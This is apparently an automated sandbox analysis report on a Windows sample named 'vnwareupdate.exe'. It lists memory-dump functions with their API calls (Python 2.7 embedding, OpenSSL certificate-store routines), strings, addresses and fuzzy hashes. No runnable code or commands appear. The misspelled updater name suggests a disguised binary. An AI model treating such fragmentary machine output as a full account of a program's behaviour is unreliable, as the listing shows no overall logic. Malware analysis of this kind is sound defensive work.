Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: %s(%d): %s$%s(%d): %s$line %d: %s$line %d: %s
API String ID: 376477240-977165427
Opcode ID: 1ee60c3ef4f3f96d0e52f760fe0f674f2469a1262251b638ceb3b8adf47f68e1
Instruction ID: a402ad784200b5d2e7b3299a5ed44f30f5dc3b882a6cf9661758eb5857b31e36
Opcode Fuzzy Hash: 1ee60c3ef4f3f96d0e52f760fe0f674f2469a1262251b638ceb3b8adf47f68e1
Instruction Fuzzy Hash: 560180B4A48301EFD740CF28E944A1ABBE4BB88695F408D5DF49983340D7B4D9288F66

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 00401550: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\vnwareupdate.exe,00000101), ref: 0040155C
Part of subcall function 00401550: MessageBoxA.USER32 ref: 00401573
Part of subcall function 00401550: Py_Finalize.PYTHON27 ref: 00401579

Py_SetPythonHome.PYTHON27(C:\Users\user\Desktop), ref: 004015E5
Py_SetProgramName.PYTHON27(C:\Users\user\Desktop\vnwareupdate.exe), ref: 004015F0
Py_Initialize.PYTHON27 ref: 004015F6
PySys_SetArgv.PYTHON27(?,?), ref: 00401606

Strings

C:\Users\user\Desktop\vnwareupdate.exe, xrefs: 004015EB
C:\Users\user\Desktop, xrefs: 004015DA

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ArgvFileFinalizeHomeInitializeMessageModuleProgramPythonSys_
String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\vnwareupdate.exe
API String ID: 3149624186-736291350
Opcode ID: be130f38a1083aabfbe59adb5e1fa034974a0059c86de9cdbcc5138ac4cfd3c1
Instruction ID: 22d02337bfd9236c1583eb08e6e7a3821f8b09df805bf4ac1989b62bd75ad719
Opcode Fuzzy Hash: be130f38a1083aabfbe59adb5e1fa034974a0059c86de9cdbcc5138ac4cfd3c1
Instruction Fuzzy Hash: 6DF03074211300DFD305AF64DF4DA193BA4BB85315F504565FA15A72E1D7F59481CB28

Uniqueness

Uniqueness Score: -1.00%

Function 02CA0CD0, Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02CA0D25
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02CA0D4A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000), ref: 02CA0D62
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,00000000), ref: 02CA0D87

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 7ae54b4e6f8d60a0c32c433cd583989aad3c89d372544066910ee02c744877ba
Instruction ID: eb7bcf9a1e958df2b284b509b7d8eed4c9a61ae8f08b375609b2296012ec1b8d
Opcode Fuzzy Hash: 7ae54b4e6f8d60a0c32c433cd583989aad3c89d372544066910ee02c744877ba
Instruction Fuzzy Hash: AE418872B4020ABBDB50DB68CC91FAFB3B9EF84764F204619FA15972C4DB71E9018754

Uniqueness

Uniqueness Score: -1.00%

Function 02C9DA30, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

isspace.MSVCR90 ref: 02C9DA74
strchr.MSVCR90 ref: 02C9DA8E
isspace.MSVCR90 ref: 02C9DAC8
isspace.MSVCR90 ref: 02C9DADA

Strings

..\..\openssl-1.1.0e\crypto\conf\conf_mod.c, xrefs: 02C9DA3E

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: isspace$strchr
String ID: ..\..\openssl-1.1.0e\crypto\conf\conf_mod.c
API String ID: 3097930973-4068718654
Opcode ID: b6bff6ffaa0ccc0101b8fa333a10a4547e8b1418e8e412c4a63fb618312833c4
Instruction ID: 114dd86c8681a521f568a0934d36eb5ce20dcdb1d19b2f4c2e5c81a115ae2168
Opcode Fuzzy Hash: b6bff6ffaa0ccc0101b8fa333a10a4547e8b1418e8e412c4a63fb618312833c4
Instruction Fuzzy Hash: 73213A7258C3026BEF216A259C4CB77B7998FC1344F080464ED8B77145EF61E76AC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02CA0730, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 02CA075B
CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 02CA078C

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02CA076F, 02CA079D, 02CA07CC, 02CA07EF
capi_cert_get_fname, xrefs: 02CA073C

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextProperty
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$capi_cert_get_fname
API String ID: 665277682-1942231813
Opcode ID: c74180ee29eb99d50754396cdf9c3fa73ba730bf9ffcc2fa6a83e6a23dffdb30
Instruction ID: b750f19c702fec382f2eb3e1881cdda279e2941c03f1cdd128a9bd69adcd41a6
Opcode Fuzzy Hash: c74180ee29eb99d50754396cdf9c3fa73ba730bf9ffcc2fa6a83e6a23dffdb30
Instruction Fuzzy Hash: 05112BB2B813117AF21073747CC5F6F13499F80B98F140825F605D6A81EAA1DA25DDE5

Uniqueness

Uniqueness Score: -1.00%

Function 02C3CFB7, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 412COMMON

Download Yara Rule

Strings

wrong type "boolean" for intXXXX or uintXXXX operator, xrefs: 02C3D03E
wrong type "float" for intXXXX or uintXXXX operator, xrefs: 02C3D004
wrong type "string" for intXXXX or uintXXXX operator, xrefs: 02C3D019
wrong type "integer" for intXXXX or uintXXXX operator, xrefs: 02C3CFE5

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for intXXXX or uintXXXX operator$wrong type "float" for intXXXX or uintXXXX operator$wrong type "integer" for intXXXX or uintXXXX operator$wrong type "string" for intXXXX or uintXXXX operator
API String ID: 0-3777382260
Opcode ID: 3989e71d186bed1248f3fac499419fa64a33956195edec25cb2bbb399816928c
Instruction ID: 3b68f38888fb92f0f0034329fad91738244fb1999c78dcf2a25923116af13f65
Opcode Fuzzy Hash: 3989e71d186bed1248f3fac499419fa64a33956195edec25cb2bbb399816928c
Instruction Fuzzy Hash: A40259B1A083459FD314CF18C480A6AB7E5BFC8304F148A1EE9898B351E774EA56CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C3C083, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 402COMMON

Download Yara Rule

Strings

wrong type "float" for at operator, xrefs: 02C3C0B2
wrong type "integer" for at operator, xrefs: 02C3C0A6
wrong type "boolean" for at operator, xrefs: 02C3C0D8
wrong type "string" for at operator, xrefs: 02C3C0C5

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for at operator$wrong type "float" for at operator$wrong type "integer" for at operator$wrong type "string" for at operator
API String ID: 0-3797521198
Opcode ID: 5c9f0d53fdc57a43ec883a10a9920e54800af40e39c7b4995d12ae1bd2b0908d
Instruction ID: 4aebff38d8170e947782ab82b4ea6fedc7c044b409a2b5e8cd3f65db092a962a
Opcode Fuzzy Hash: 5c9f0d53fdc57a43ec883a10a9920e54800af40e39c7b4995d12ae1bd2b0908d
Instruction Fuzzy Hash: B80248B1A083459FD314CF18C480A6AB7F5BFC8704F548E2EE5898B351E774EA56CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C71DB0, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.MSVCR90 ref: 02C71E62

Part of subcall function 02C799B0: raise.MSVCR90 ref: 02C799CB
Part of subcall function 02C799B0: _exit.MSVCR90 ref: 02C799D5

Strings

assertion failed: *sbuffer != NULL || buffer != NULL, xrefs: 02C71DC8
assertion failed: *currlen <= *maxlen, xrefs: 02C71DE6
assertion failed: *sbuffer != NULL, xrefs: 02C71E4C
..\..\openssl-1.1.0e\crypto\bio\b_print.c, xrefs: 02C71DC3, 02C71DE1, 02C71E24, 02C71E47, 02C71E77

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _exitmemcpyraise
String ID: ..\..\openssl-1.1.0e\crypto\bio\b_print.c$assertion failed: *currlen <= *maxlen$assertion failed: *sbuffer != NULL$assertion failed: *sbuffer != NULL || buffer != NULL
API String ID: 1298853163-2319055813
Opcode ID: 03904245c7137c1daf0c4466d148585e5d3d0ea93e516cfcb7e3c9b7658d980b
Instruction ID: 0479cc88c55b1569df4cd6f591b423a2c20f46281e713b2ba136d640f557b00c
Opcode Fuzzy Hash: 03904245c7137c1daf0c4466d148585e5d3d0ea93e516cfcb7e3c9b7658d980b
Instruction Fuzzy Hash: B92183B4640341ABFB619F24EC86F2573B5AF91704F280468F95D9B385EBF1DA84CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02C72A00, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 432COMMON

Download Yara Rule

APIs

isdigit.MSVCR90 ref: 02C72B69
isdigit.MSVCR90 ref: 02C72BDA

Strings

*, xrefs: 02C72B90
*, xrefs: 02C72C07

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: isdigit
String ID: *$*
API String ID: 2326231117-3771216468
Opcode ID: 0ef8e181e064269ebe357fe44a357b47b3ef63b954d6ee3559cb864282a60cf7
Instruction ID: a7c95287700b851b2b275740215d8e78bc883503c1ba18f1e626a2ce22f7842d
Opcode Fuzzy Hash: 0ef8e181e064269ebe357fe44a357b47b3ef63b954d6ee3559cb864282a60cf7
Instruction Fuzzy Hash: F3F156B16482419FE324CF19C880A2BB7F5FBD9714F14491DF98687291D371EA4ACBA3

Uniqueness

Uniqueness Score: -1.00%

Function 02C72010, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02C720F9

Strings

0123456789ABCDEF, xrefs: 02C720E5
, xrefs: 02C720A4
0123456789abcdef, xrefs: 02C720EC

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: $0123456789ABCDEF$0123456789abcdef
API String ID: 1302938615-30751140
Opcode ID: fcea7792c7b8dfdfa33832a42d13dac094f5f7eaddf70318736ee9a9da2a1a58
Instruction ID: edbb5718585cb7ee4ad610d5b3b07aafc3aadfc5f2bc8b1e0f09a9097f2802ac
Opcode Fuzzy Hash: fcea7792c7b8dfdfa33832a42d13dac094f5f7eaddf70318736ee9a9da2a1a58
Instruction Fuzzy Hash: A5915A75A083418BDB14CE29D88462BBBE2BBD8358F08491DFD84A7345D771EA45CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 02CA09E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82encryptionCOMMON

Download Yara Rule

APIs

CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 02CA0A04
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 02CA0A6C
CertFindCertificateInStore.CRYPT32(?,00000001,00000000,00070007,?,00000000), ref: 02CA0A97

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02CA0A56

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnum$CertificateFind
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 3417037084-79188018
Opcode ID: 03e19eb35c88061acf873877124738eaea55d4426ba2470fba2763fda0eda418
Instruction ID: 0f91d8d482373d08bc629468c987f51cade35c57ca731df58ec1c8b89cc470ee
Opcode Fuzzy Hash: 03e19eb35c88061acf873877124738eaea55d4426ba2470fba2763fda0eda418
Instruction Fuzzy Hash: 191159377C42026BD7218638AC30B7B7B9A9BC16A8F084628FD4ED7681D732DE048250

Uniqueness

Uniqueness Score: -1.00%

Function 02CA0650, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000,?), ref: 02CA066B

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02CA067E, 02CA06AA, 02CA06E9, 02CA070C

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextProperty
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 665277682-79188018
Opcode ID: c498834c03f8eb4bc2d4067f284c9c702a16b23d2c95ed4e0b1ec4fabe27345d
Instruction ID: 68d73d4ebe8b14703a8b28fb156750b88388dfaa8601bbba6766615d4f8bbc90
Opcode Fuzzy Hash: c498834c03f8eb4bc2d4067f284c9c702a16b23d2c95ed4e0b1ec4fabe27345d
Instruction Fuzzy Hash: 95110BB1F803123EF610A7747CC9F7B539D9F80B58F500815FA09D5681FAA1C9205ED5

Uniqueness

Uniqueness Score: -1.00%

Function 02C311C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02C311E0
_PyObject_CallMethod_SizeT.PYTHON27(?,write,02D45570,?,?), ref: 02C311F9
PyGILState_Release.PYTHON27(00000000), ref: 02C31202

Strings

write, xrefs: 02C311F3

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: State_$CallEnsureMethod_Object_ReleaseSize
String ID: write
API String ID: 4072352160-2104195679
Opcode ID: 714088803c091c9196fa2a1d909773736bd012e897e1030ecb8ba6404e8343b6
Instruction ID: 3cd1052f98cac92c6a2f59bb47257dbf67898c3b844c96bf5330e95e47b37123
Opcode Fuzzy Hash: 714088803c091c9196fa2a1d909773736bd012e897e1030ecb8ba6404e8343b6
Instruction Fuzzy Hash: 0001C472A083459FD300DF64EC44A9BB7E8FFC4269F140E1DF19983240D771DA198B91

Uniqueness

Uniqueness Score: -1.00%

Function 02C49990, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

malloc.MSVCR90 ref: 02C49999

Part of subcall function 02C49820: longjmp.MSVCR90(00000000,00000001,out of dynamic memory in yyensure_buffer_stack()), ref: 02C49830

realloc.MSVCR90 ref: 02C499E1

Strings

out of dynamic memory in yyensure_buffer_stack(), xrefs: 02C499F1
out of dynamic memory in yyensure_buffer_stack(), xrefs: 02C499A9

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: longjmpmallocrealloc
String ID: out of dynamic memory in yyensure_buffer_stack()$out of dynamic memory in yyensure_buffer_stack()
API String ID: 3627333404-1634691470
Opcode ID: 93d549b980790bfccf9cbaf6a1963fbf0abca82a20bf5e7ba5afd55ba7985ef1
Instruction ID: 9181751e351db7653dfd35c426355ace0a406284a83d6bee1421c68517dd0a14
Opcode Fuzzy Hash: 93d549b980790bfccf9cbaf6a1963fbf0abca82a20bf5e7ba5afd55ba7985ef1
Instruction Fuzzy Hash: 781118B09047128FD728CF28E844B477BF4BF44708F058A6EE00A8B611EB75E609CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02C404E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

malloc.MSVCR90 ref: 02C404E9

Part of subcall function 02C40370: longjmp.MSVCR90(00000000,00000001,out of dynamic memory in yyensure_buffer_stack()), ref: 02C40380

realloc.MSVCR90 ref: 02C40531

Strings

out of dynamic memory in yyensure_buffer_stack(), xrefs: 02C404F9
out of dynamic memory in yyensure_buffer_stack(), xrefs: 02C40541

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: longjmpmallocrealloc
String ID: out of dynamic memory in yyensure_buffer_stack()$out of dynamic memory in yyensure_buffer_stack()
API String ID: 3627333404-1634691470
Opcode ID: 1542cd42c6e8aba2d6cb4905264e0fa47a01ff71e90226ce60e6bc86eb2c851a
Instruction ID: 163f19aad982c39c3f9aaf553827ffdc50efb485ba720961eb389b3bc8ab942d
Opcode Fuzzy Hash: 1542cd42c6e8aba2d6cb4905264e0fa47a01ff71e90226ce60e6bc86eb2c851a
Instruction Fuzzy Hash: 1D11C2B09447018FD728CF28E804B467BF5EF45708B058A6EE14A9B621EB75E609CF99

Uniqueness

Uniqueness Score: -1.00%

Function 02C41C80, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

malloc.MSVCR90 ref: 02C41C89

Part of subcall function 02C41B80: longjmp.MSVCR90(?,00000001,?,?,?), ref: 02C41B9C

realloc.MSVCR90 ref: 02C41CD1

Strings

out of dynamic memory in yyensure_buffer_stack(), xrefs: 02C41CE1
out of dynamic memory in yyensure_buffer_stack(), xrefs: 02C41C99

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: longjmpmallocrealloc
String ID: out of dynamic memory in yyensure_buffer_stack()$out of dynamic memory in yyensure_buffer_stack()
API String ID: 3627333404-1634691470
Opcode ID: c6a489cf705f97ccb2c91db70e5e1a135cb413afaab1edb91734b90d31a6c37c
Instruction ID: b3d14029f83ce164642d8aa7379ffdb8931b4e3838c108253abba59cb23c1baa
Opcode Fuzzy Hash: c6a489cf705f97ccb2c91db70e5e1a135cb413afaab1edb91734b90d31a6c37c
Instruction Fuzzy Hash: 5B112AB0904B018FD728CF18E804B477BF5BF44748B098A6EE14A8B611EBB5E649CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02CA0960, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32(00000009,00000000,00000000,?,00000000), ref: 02CA098E
GetLastError.KERNEL32 ref: 02CA09C4

Strings

Opening certificate store %s, xrefs: 02CA0974
